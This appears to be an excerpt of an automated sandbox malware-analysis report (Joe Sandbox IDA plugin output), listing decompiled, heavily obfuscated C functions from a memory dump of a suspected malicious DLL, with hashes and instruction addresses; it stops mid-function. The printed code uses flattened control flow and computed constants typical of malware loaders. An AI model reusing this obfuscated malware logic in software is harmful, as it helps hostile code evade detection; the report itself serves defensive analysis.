                                                                                                                                                                            • Instruction Fuzzy Hash: 31B10071A093419FC358CF69C48991BFBE1BBC4798F50892DFAA597220D3B4D949CF82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                                            			E02F72D53(void* __ecx, void* __edx) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				void* _t237;
                                                                                                                                                                            				intOrPtr _t238;
                                                                                                                                                                            				intOrPtr _t239;
                                                                                                                                                                            				void* _t243;
                                                                                                                                                                            				signed int _t245;
                                                                                                                                                                            				signed int _t246;
                                                                                                                                                                            				signed int _t247;
                                                                                                                                                                            				void* _t267;
                                                                                                                                                                            				void* _t268;
                                                                                                                                                                            				signed int* _t271;
                                                                                                                                                                            				signed int* _t272;
                                                                                                                                                                            
                                                                                                                                                                            				_t271 =  &_v104;
                                                                                                                                                                            				_v4 = _v4 & 0x00000000;
                                                                                                                                                                            				_v12 = 0xb3680a;
                                                                                                                                                                            				_v8 = 0x44a7b2;
                                                                                                                                                                            				_v84 = 0x16e473;
                                                                                                                                                                            				_v84 = _v84 | 0xff7fd6cb;
                                                                                                                                                                            				_v84 = _v84 << 0xe;
                                                                                                                                                                            				_v84 = _v84 ^ 0xfdb25567;
                                                                                                                                                                            				_v88 = 0x1491df;
                                                                                                                                                                            				_v88 = _v88 | 0x25bec09f;
                                                                                                                                                                            				_v88 = _v88 + 0xf90e;
                                                                                                                                                                            				_v88 = _v88 << 0x10;
                                                                                                                                                                            				_v88 = _v88 ^ 0xcae39943;
                                                                                                                                                                            				_v92 = 0xaddb4a;
                                                                                                                                                                            				_v92 = _v92 ^ 0x38a1add8;
                                                                                                                                                                            				_t267 = __edx;
                                                                                                                                                                            				_t243 = __ecx;
                                                                                                                                                                            				_t245 = 0x27;
                                                                                                                                                                            				_t268 = 0x72ed85;
                                                                                                                                                                            				_v92 = _v92 / _t245;
                                                                                                                                                                            				_t246 = 0x26;
                                                                                                                                                                            				_v92 = _v92 * 0x56;
                                                                                                                                                                            				_v92 = _v92 ^ 0x7b991acf;
                                                                                                                                                                            				_v36 = 0x41254;
                                                                                                                                                                            				_v36 = _v36 ^ 0x82dbc96b;
                                                                                                                                                                            				_v36 = _v36 ^ 0x82dd2337;
                                                                                                                                                                            				_v28 = 0x754151;
                                                                                                                                                                            				_v28 = _v28 + 0x3d65;
                                                                                                                                                                            				_v28 = _v28 ^ 0x0076627a;
                                                                                                                                                                            				_v76 = 0xa9aca8;
                                                                                                                                                                            				_v76 = _v76 * 0x46;
                                                                                                                                                                            				_v76 = _v76 << 0x10;
                                                                                                                                                                            				_v76 = _v76 * 0x71;
                                                                                                                                                                            				_v76 = _v76 ^ 0xcef7d733;
                                                                                                                                                                            				_v80 = 0x19ef1d;
                                                                                                                                                                            				_v80 = _v80 + 0x4807;
                                                                                                                                                                            				_v80 = _v80 >> 0x10;
                                                                                                                                                                            				_t247 = 9;
                                                                                                                                                                            				_v80 = _v80 / _t246;
                                                                                                                                                                            				_v80 = _v80 ^ 0x000e4732;
                                                                                                                                                                            				_v32 = 0xb4891b;
                                                                                                                                                                            				_v32 = _v32 | 0x91ee1565;
                                                                                                                                                                            				_v32 = _v32 ^ 0x91f206c4;
                                                                                                                                                                            				_v52 = 0xb65ed8;
                                                                                                                                                                            				_v52 = _v52 ^ 0x53a92618;
                                                                                                                                                                            				_v52 = _v52 * 0x77;
                                                                                                                                                                            				_v52 = _v52 ^ 0xa3a75cc7;
                                                                                                                                                                            				_v20 = 0xeecfa7;
                                                                                                                                                                            				_v20 = _v20 << 6;
                                                                                                                                                                            				_v20 = _v20 ^ 0x3bb2e2c4;
                                                                                                                                                                            				_v72 = 0xfbd7a5;
                                                                                                                                                                            				_v72 = _v72 ^ 0x9f68e208;
                                                                                                                                                                            				_v72 = _v72 << 8;
                                                                                                                                                                            				_v72 = _v72 | 0x30258995;
                                                                                                                                                                            				_v72 = _v72 ^ 0xb3385db1;
                                                                                                                                                                            				_v24 = 0x1aaffc;
                                                                                                                                                                            				_v24 = _v24 * 0x36;
                                                                                                                                                                            				_v24 = _v24 ^ 0x05ac1646;
                                                                                                                                                                            				_v16 = 0xb69c42;
                                                                                                                                                                            				_v16 = _v16 + 0x3887;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00b1c7d8;
                                                                                                                                                                            				_v44 = 0x5789e3;
                                                                                                                                                                            				_v44 = _v44 / _t247;
                                                                                                                                                                            				_v44 = _v44 + 0xffffe7e6;
                                                                                                                                                                            				_v44 = _v44 ^ 0x00087fde;
                                                                                                                                                                            				_v68 = 0x94873;
                                                                                                                                                                            				_v68 = _v68 << 0xf;
                                                                                                                                                                            				_v68 = _v68 + 0xffff48e1;
                                                                                                                                                                            				_v68 = _v68 ^ 0x69c9ade9;
                                                                                                                                                                            				_v68 = _v68 ^ 0xcdf62ffc;
                                                                                                                                                                            				_v48 = 0x208212;
                                                                                                                                                                            				_v48 = _v48 | 0x39c03c72;
                                                                                                                                                                            				_v48 = _v48 >> 0xc;
                                                                                                                                                                            				_v48 = _v48 ^ 0x0008cd3c;
                                                                                                                                                                            				_v96 = 0x3b2be3;
                                                                                                                                                                            				_v96 = _v96 ^ 0x07755c49;
                                                                                                                                                                            				_v96 = _v96 >> 0xf;
                                                                                                                                                                            				_v96 = _v96 ^ 0x076fdb2f;
                                                                                                                                                                            				_v96 = _v96 ^ 0x07616547;
                                                                                                                                                                            				_v100 = 0xac4dde;
                                                                                                                                                                            				_v100 = _v100 + 0x3900;
                                                                                                                                                                            				_t248 = 0x42;
                                                                                                                                                                            				_v100 = _v100 * 0x54;
                                                                                                                                                                            				_v100 = _v100 ^ 0x672a87d3;
                                                                                                                                                                            				_v100 = _v100 ^ 0x5fb939da;
                                                                                                                                                                            				_v104 = 0x9fab94;
                                                                                                                                                                            				_v104 = _v104 ^ 0x81ae57b6;
                                                                                                                                                                            				_v104 = _v104 | 0x48b65982;
                                                                                                                                                                            				_v104 = _v104 * 0x3c;
                                                                                                                                                                            				_v104 = _v104 ^ 0x471b6d30;
                                                                                                                                                                            				_v56 = 0x9acae2;
                                                                                                                                                                            				_v56 = _v56 << 3;
                                                                                                                                                                            				_v56 = _v56 >> 0xf;
                                                                                                                                                                            				_v56 = _v56 ^ 0x000181ed;
                                                                                                                                                                            				_v60 = 0x9f5509;
                                                                                                                                                                            				_v60 = _v60 / _t248;
                                                                                                                                                                            				_v60 = _v60 >> 3;
                                                                                                                                                                            				_v60 = _v60 + 0xfffff221;
                                                                                                                                                                            				_v60 = _v60 ^ 0x000ffb1e;
                                                                                                                                                                            				_v40 = 0x6ff3a2;
                                                                                                                                                                            				_v40 = _v40 << 9;
                                                                                                                                                                            				_v40 = _v40 + 0x9f22;
                                                                                                                                                                            				_v40 = _v40 ^ 0xdfef744e;
                                                                                                                                                                            				_v64 = 0xeafe6e;
                                                                                                                                                                            				_v64 = _v64 ^ 0x9deccfb6;
                                                                                                                                                                            				_v64 = _v64 << 0xf;
                                                                                                                                                                            				_v64 = _v64 * 0x79;
                                                                                                                                                                            				_v64 = _v64 ^ 0xc780890d;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t237 = 0xd8fe181;
                                                                                                                                                                            					do {
                                                                                                                                                                            						L2:
                                                                                                                                                                            						while(_t268 != 0x72ed85) {
                                                                                                                                                                            							if(_t268 == 0xb6c7232) {
                                                                                                                                                                            								_t263 = _v44;
                                                                                                                                                                            								_t248 = _v16;
                                                                                                                                                                            								_t238 = E02F71005(_v16, _v44, _v68, _v48,  *((intOrPtr*)(_t267 + 0x38)));
                                                                                                                                                                            								_t271 =  &(_t271[3]);
                                                                                                                                                                            								 *((intOrPtr*)(_t267 + 0x2c)) = _t238;
                                                                                                                                                                            								__eflags = _t238;
                                                                                                                                                                            								_t237 = 0xd8fe181;
                                                                                                                                                                            								_t268 =  !=  ? 0xd8fe181 : 0xd6f812a;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t268 == 0xc5020c9) {
                                                                                                                                                                            								_push(_v36);
                                                                                                                                                                            								_t239 = E02F73263(_v84, _v88, __eflags, _t243, _v92, _t248);
                                                                                                                                                                            								_t272 =  &(_t271[4]);
                                                                                                                                                                            								 *((intOrPtr*)(_t267 + 0x38)) = _t239;
                                                                                                                                                                            								__eflags = _t239;
                                                                                                                                                                            								if(_t239 != 0) {
                                                                                                                                                                            									E02F7148A(_t239, _t239, _v28, _v76, _v80, _v32);
                                                                                                                                                                            									_t263 = _v20;
                                                                                                                                                                            									_t248 = _v52;
                                                                                                                                                                            									E02F5E2BD(_v20, _v72,  *((intOrPtr*)(_t267 + 0x38)), _v24);
                                                                                                                                                                            									_t271 =  &(_t272[7]);
                                                                                                                                                                            									_t268 = 0xb6c7232;
                                                                                                                                                                            									goto L1;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t268 == 0xd6f812a) {
                                                                                                                                                                            									return E02F5F0E9(_v60,  *((intOrPtr*)(_t267 + 0x38)), _v40, _v64);
                                                                                                                                                                            								}
                                                                                                                                                                            								if(_t268 != _t237) {
                                                                                                                                                                            									goto L13;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t239 = E02F60EBC(_v96, _t263, _v100, _v96, _v104, _v56, _v96, _t248, _t267, E02F6A2A5);
                                                                                                                                                                            									_t271 =  &(_t271[8]);
                                                                                                                                                                            									 *((intOrPtr*)(_t267 + 0x48)) = _t239;
                                                                                                                                                                            									if(_t239 == 0) {
                                                                                                                                                                            										_t268 = 0xd6f812a;
                                                                                                                                                                            										while(1) {
                                                                                                                                                                            											L1:
                                                                                                                                                                            											_t237 = 0xd8fe181;
                                                                                                                                                                            											goto L2;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							return _t239;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t268 = 0xc5020c9;
                                                                                                                                                                            						L13:
                                                                                                                                                                            						__eflags = _t268 - 0x11d9bb5;
                                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                                            					return _t237;
                                                                                                                                                                            				}
                                                                                                                                                                            			}








































                                                                                                                                                                            0x02f72d53
                                                                                                                                                                            0x02f72d56
                                                                                                                                                                            0x02f72d5b
                                                                                                                                                                            0x02f72d63
                                                                                                                                                                            0x02f72d6b
                                                                                                                                                                            0x02f72d73
                                                                                                                                                                            0x02f72d7b
                                                                                                                                                                            0x02f72d80
                                                                                                                                                                            0x02f72d88
                                                                                                                                                                            0x02f72d90
                                                                                                                                                                            0x02f72d98
                                                                                                                                                                            0x02f72da0
                                                                                                                                                                            0x02f72da5
                                                                                                                                                                            0x02f72dad
                                                                                                                                                                            0x02f72db5
                                                                                                                                                                            0x02f72dc7
                                                                                                                                                                            0x02f72dc9
                                                                                                                                                                            0x02f72dcb
                                                                                                                                                                            0x02f72dce
                                                                                                                                                                            0x02f72dd7
                                                                                                                                                                            0x02f72de2
                                                                                                                                                                            0x02f72de5
                                                                                                                                                                            0x02f72de9
                                                                                                                                                                            0x02f72df1
                                                                                                                                                                            0x02f72df9
                                                                                                                                                                            0x02f72e01
                                                                                                                                                                            0x02f72e09
                                                                                                                                                                            0x02f72e11
                                                                                                                                                                            0x02f72e19
                                                                                                                                                                            0x02f72e21
                                                                                                                                                                            0x02f72e2e
                                                                                                                                                                            0x02f72e32
                                                                                                                                                                            0x02f72e3c
                                                                                                                                                                            0x02f72e40
                                                                                                                                                                            0x02f72e48
                                                                                                                                                                            0x02f72e50
                                                                                                                                                                            0x02f72e58
                                                                                                                                                                            0x02f72e63
                                                                                                                                                                            0x02f72e64
                                                                                                                                                                            0x02f72e68
                                                                                                                                                                            0x02f72e70
                                                                                                                                                                            0x02f72e78
                                                                                                                                                                            0x02f72e80
                                                                                                                                                                            0x02f72e88
                                                                                                                                                                            0x02f72e90
                                                                                                                                                                            0x02f72e9d
                                                                                                                                                                            0x02f72ea1
                                                                                                                                                                            0x02f72ea9
                                                                                                                                                                            0x02f72eb1
                                                                                                                                                                            0x02f72eb6
                                                                                                                                                                            0x02f72ebe
                                                                                                                                                                            0x02f72ec6
                                                                                                                                                                            0x02f72ece
                                                                                                                                                                            0x02f72ed3
                                                                                                                                                                            0x02f72edb
                                                                                                                                                                            0x02f72ee3
                                                                                                                                                                            0x02f72ef0
                                                                                                                                                                            0x02f72ef4
                                                                                                                                                                            0x02f72efc
                                                                                                                                                                            0x02f72f04
                                                                                                                                                                            0x02f72f0c
                                                                                                                                                                            0x02f72f16
                                                                                                                                                                            0x02f72f26
                                                                                                                                                                            0x02f72f2c
                                                                                                                                                                            0x02f72f39
                                                                                                                                                                            0x02f72f41
                                                                                                                                                                            0x02f72f49
                                                                                                                                                                            0x02f72f4e
                                                                                                                                                                            0x02f72f56
                                                                                                                                                                            0x02f72f5e
                                                                                                                                                                            0x02f72f66
                                                                                                                                                                            0x02f72f6e
                                                                                                                                                                            0x02f72f76
                                                                                                                                                                            0x02f72f7b
                                                                                                                                                                            0x02f72f83
                                                                                                                                                                            0x02f72f8b
                                                                                                                                                                            0x02f72f93
                                                                                                                                                                            0x02f72f98
                                                                                                                                                                            0x02f72fa0
                                                                                                                                                                            0x02f72fa8
                                                                                                                                                                            0x02f72fb0
                                                                                                                                                                            0x02f72fbd
                                                                                                                                                                            0x02f72fbe
                                                                                                                                                                            0x02f72fc2
                                                                                                                                                                            0x02f72fca
                                                                                                                                                                            0x02f72fd2
                                                                                                                                                                            0x02f72fda
                                                                                                                                                                            0x02f72fe2
                                                                                                                                                                            0x02f72fef
                                                                                                                                                                            0x02f72ff3
                                                                                                                                                                            0x02f72ffb
                                                                                                                                                                            0x02f73003
                                                                                                                                                                            0x02f73008
                                                                                                                                                                            0x02f7300d
                                                                                                                                                                            0x02f73015
                                                                                                                                                                            0x02f73023
                                                                                                                                                                            0x02f73027
                                                                                                                                                                            0x02f7302c
                                                                                                                                                                            0x02f73034
                                                                                                                                                                            0x02f7303c
                                                                                                                                                                            0x02f73044
                                                                                                                                                                            0x02f73049
                                                                                                                                                                            0x02f73051
                                                                                                                                                                            0x02f73059
                                                                                                                                                                            0x02f73061
                                                                                                                                                                            0x02f73069
                                                                                                                                                                            0x02f73073
                                                                                                                                                                            0x02f73077
                                                                                                                                                                            0x02f7307f
                                                                                                                                                                            0x02f7307f
                                                                                                                                                                            0x02f7307f
                                                                                                                                                                            0x02f73084
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73084
                                                                                                                                                                            0x02f73096
                                                                                                                                                                            0x02f73155
                                                                                                                                                                            0x02f73159
                                                                                                                                                                            0x02f7315d
                                                                                                                                                                            0x02f73162
                                                                                                                                                                            0x02f73165
                                                                                                                                                                            0x02f73168
                                                                                                                                                                            0x02f7316c
                                                                                                                                                                            0x02f73171
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73171
                                                                                                                                                                            0x02f730a2
                                                                                                                                                                            0x02f730e4
                                                                                                                                                                            0x02f730f6
                                                                                                                                                                            0x02f730fb
                                                                                                                                                                            0x02f730fe
                                                                                                                                                                            0x02f73101
                                                                                                                                                                            0x02f73103
                                                                                                                                                                            0x02f7311d
                                                                                                                                                                            0x02f7312d
                                                                                                                                                                            0x02f73134
                                                                                                                                                                            0x02f73138
                                                                                                                                                                            0x02f7313d
                                                                                                                                                                            0x02f73140
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73140
                                                                                                                                                                            0x02f730a4
                                                                                                                                                                            0x02f730a6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f731a1
                                                                                                                                                                            0x02f730ae
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f730b4
                                                                                                                                                                            0x02f730cd
                                                                                                                                                                            0x02f730d2
                                                                                                                                                                            0x02f730d5
                                                                                                                                                                            0x02f730da
                                                                                                                                                                            0x02f730e0
                                                                                                                                                                            0x02f7307f
                                                                                                                                                                            0x02f7307f
                                                                                                                                                                            0x02f7307f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f7307f
                                                                                                                                                                            0x02f7307f
                                                                                                                                                                            0x02f730da
                                                                                                                                                                            0x02f730ae
                                                                                                                                                                            0x02f731a9
                                                                                                                                                                            0x02f731a9
                                                                                                                                                                            0x02f73179
                                                                                                                                                                            0x02f7317e
                                                                                                                                                                            0x02f7317e
                                                                                                                                                                            0x02f7317e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73084

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $P$sH$zbv$+;
                                                                                                                                                                            • API String ID: 0-3806253346
                                                                                                                                                                            • Opcode ID: e6a7fbfcae462f5ceb2054e3664707452d1c15233e274e74194797e846a560c5
                                                                                                                                                                            • Instruction ID: 828c68874d68b1eb8cc90ec1e09b6551f7a0ff025e2f3f30235f0214a585493e
                                                                                                                                                                            • Opcode Fuzzy Hash: e6a7fbfcae462f5ceb2054e3664707452d1c15233e274e74194797e846a560c5
                                                                                                                                                                            • Instruction Fuzzy Hash: 74B11172908381AFD358CF61C48A41BFBE2BBC4758F509A1DF69696260D3B1D949CF83
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E02F6E4E5(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                                            				intOrPtr _v140;
                                                                                                                                                                            				char _v152;
                                                                                                                                                                            				char _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				unsigned int _v200;
                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                            				void* _t118;
                                                                                                                                                                            				signed int _t141;
                                                                                                                                                                            				void* _t151;
                                                                                                                                                                            				intOrPtr _t166;
                                                                                                                                                                            				intOrPtr _t182;
                                                                                                                                                                            				signed int _t183;
                                                                                                                                                                            				intOrPtr _t184;
                                                                                                                                                                            				signed int* _t187;
                                                                                                                                                                            				void* _t189;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				E02F6FE29(_t118);
                                                                                                                                                                            				_v196 = 0x42a34f;
                                                                                                                                                                            				_t187 =  &(( &_v200)[5]);
                                                                                                                                                                            				_v196 = _v196 + 0xffffd591;
                                                                                                                                                                            				_v196 = _v196 >> 8;
                                                                                                                                                                            				_t182 = 0;
                                                                                                                                                                            				_v196 = _v196 >> 0xd;
                                                                                                                                                                            				_t151 = 0x8265549;
                                                                                                                                                                            				_v196 = _v196 ^ 0x000e54fd;
                                                                                                                                                                            				_v192 = 0xf4ad66;
                                                                                                                                                                            				_t183 = 0x28;
                                                                                                                                                                            				_v192 = _v192 * 0x74;
                                                                                                                                                                            				_v192 = _v192 + 0xffff9a5e;
                                                                                                                                                                            				_v192 = _v192 * 0x25;
                                                                                                                                                                            				_v192 = _v192 ^ 0x06100388;
                                                                                                                                                                            				_v164 = 0xada112;
                                                                                                                                                                            				_v164 = _v164 << 6;
                                                                                                                                                                            				_v164 = _v164 ^ 0x2b616de0;
                                                                                                                                                                            				_v188 = 0x6e3b94;
                                                                                                                                                                            				_v188 = _v188 * 0x6f;
                                                                                                                                                                            				_v188 = _v188 ^ 0xb2fa2ce6;
                                                                                                                                                                            				_v188 = _v188 >> 2;
                                                                                                                                                                            				_v188 = _v188 ^ 0x27407061;
                                                                                                                                                                            				_v184 = 0x76ba26;
                                                                                                                                                                            				_v184 = _v184 ^ 0xa3b8c1ec;
                                                                                                                                                                            				_v184 = _v184 * 6;
                                                                                                                                                                            				_v184 = _v184 ^ 0xd6d91427;
                                                                                                                                                                            				_v172 = 0x136254;
                                                                                                                                                                            				_v172 = _v172 + 0x2ded;
                                                                                                                                                                            				_v172 = _v172 ^ 0x001b6319;
                                                                                                                                                                            				_v200 = 0xa09af9;
                                                                                                                                                                            				_v200 = _v200 + 0x31d;
                                                                                                                                                                            				_v200 = _v200 + 0xffff390b;
                                                                                                                                                                            				_v200 = _v200 >> 0xc;
                                                                                                                                                                            				_v200 = _v200 ^ 0x000c9fcd;
                                                                                                                                                                            				_v176 = 0xee2a82;
                                                                                                                                                                            				_v176 = _v176 / _t183;
                                                                                                                                                                            				_v176 = _v176 ^ 0x000a5024;
                                                                                                                                                                            				_t66 =  &_v176; // 0xa5024
                                                                                                                                                                            				_t184 =  *_t66;
                                                                                                                                                                            				_v180 = 0xbc2dba;
                                                                                                                                                                            				_v180 = _v180 << 0xa;
                                                                                                                                                                            				_v180 = _v180 << 0xc;
                                                                                                                                                                            				_v180 = _v180 ^ 0x6e88cd95;
                                                                                                                                                                            				_v168 = 0x8f86b;
                                                                                                                                                                            				_v168 = _v168 * 0x73;
                                                                                                                                                                            				_v168 = _v168 ^ 0x040961a3;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t189 = _t151 - 0x90fe06e;
                                                                                                                                                                            					if(_t189 > 0) {
                                                                                                                                                                            						goto L23;
                                                                                                                                                                            					}
                                                                                                                                                                            					L2:
                                                                                                                                                                            					if(_t189 == 0) {
                                                                                                                                                                            						__eflags = _v140 - 3;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							E02F700EF( &_v152);
                                                                                                                                                                            							L16:
                                                                                                                                                                            							_t151 = 0x574a4dd;
                                                                                                                                                                            							continue;
                                                                                                                                                                            							do {
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									_t189 = _t151 - 0x90fe06e;
                                                                                                                                                                            									if(_t189 > 0) {
                                                                                                                                                                            										goto L23;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L2;
                                                                                                                                                                            								}
                                                                                                                                                                            								L45:
                                                                                                                                                                            								__eflags = _t151 - 0x4105f99;
                                                                                                                                                                            							} while (__eflags != 0);
                                                                                                                                                                            							L46:
                                                                                                                                                                            							return _t182;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t151 = 0xaf84b7f;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							_t189 = _t151 - 0x90fe06e;
                                                                                                                                                                            							if(_t189 > 0) {
                                                                                                                                                                            								goto L23;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L2;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L23;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t151 == 0x172cdb8) {
                                                                                                                                                                            						_push(_t151);
                                                                                                                                                                            						_push(_t151);
                                                                                                                                                                            						_t184 = E02F5C5D8(0x5c);
                                                                                                                                                                            						_t187 =  &(_t187[3]);
                                                                                                                                                                            						__eflags = _t184;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							L14:
                                                                                                                                                                            							_t151 = 0x666f2cd;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						 *((intOrPtr*)(_t184 + 0x30)) = _v80;
                                                                                                                                                                            						 *((intOrPtr*)(_t184 + 8)) = _v124;
                                                                                                                                                                            						 *((intOrPtr*)(_t184 + 4)) = _v92;
                                                                                                                                                                            						_t151 = 0xc6d3ff5;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t151 == 0x2270dbc) {
                                                                                                                                                                            						__eflags = _v140 - 7;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							E02F67D5B( &_v152);
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L16;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t151 == 0x39f0156) {
                                                                                                                                                                            						__eflags = E02F69D3E( &_v60, _v164, __eflags, _v188,  &_v160);
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							goto L46;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L14;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t151 == 0x574a4dd) {
                                                                                                                                                                            						_t166 =  *0x2f76210; // 0x0
                                                                                                                                                                            						_t182 = _t182 + 1;
                                                                                                                                                                            						__eflags = _t182;
                                                                                                                                                                            						 *((intOrPtr*)(_t184 + 0x24)) =  *((intOrPtr*)(_t166 + 0x210));
                                                                                                                                                                            						 *((intOrPtr*)(_t166 + 0x210)) = _t184;
                                                                                                                                                                            						L12:
                                                                                                                                                                            						_t151 = 0x39f0156;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t151 == 0x666f2cd) {
                                                                                                                                                                            						_t141 = E02F68806(_v184, _v172,  &_v160,  &_v152);
                                                                                                                                                                            						asm("sbb ecx, ecx");
                                                                                                                                                                            						_t151 = ( ~_t141 & 0xfdd3cc62) + 0x39f0156;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t151 != 0x8265549) {
                                                                                                                                                                            						goto L45;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F522A6(_a4, _v196,  &_v60, _v192);
                                                                                                                                                                            					_t187 =  &(_t187[2]);
                                                                                                                                                                            					_t151 = 0xf4b2976;
                                                                                                                                                                            					continue;
                                                                                                                                                                            					L23:
                                                                                                                                                                            					__eflags = _t151 - 0x9a4295f;
                                                                                                                                                                            					if(_t151 == 0x9a4295f) {
                                                                                                                                                                            						__eflags = _v140 - 5;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							E02F72D53( &_v152, _t184);
                                                                                                                                                                            							_t151 = 0x574a4dd;
                                                                                                                                                                            							goto L45;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t151 = 0xa7bb9ce;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t151 - 0xa7bb9ce;
                                                                                                                                                                            					if(_t151 == 0xa7bb9ce) {
                                                                                                                                                                            						__eflags = _v140 - 6;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							E02F6A474( &_v152);
                                                                                                                                                                            							goto L16;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t151 = 0x2270dbc;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t151 - 0xaf84b7f;
                                                                                                                                                                            					if(_t151 == 0xaf84b7f) {
                                                                                                                                                                            						__eflags = _v140 - 4;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							E02F5238C( &_v152);
                                                                                                                                                                            							goto L16;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t151 = 0x9a4295f;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t151 - 0xbf40480;
                                                                                                                                                                            					if(_t151 == 0xbf40480) {
                                                                                                                                                                            						__eflags = _v140 - 2;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							E02F6CCD9( &_v152, _t184);
                                                                                                                                                                            							goto L16;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t151 = 0x90fe06e;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t151 - 0xc6d3ff5;
                                                                                                                                                                            					if(_t151 == 0xc6d3ff5) {
                                                                                                                                                                            						__eflags = _v140 - 1;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							E02F5A871( &_v152);
                                                                                                                                                                            							goto L16;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t151 = 0xbf40480;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
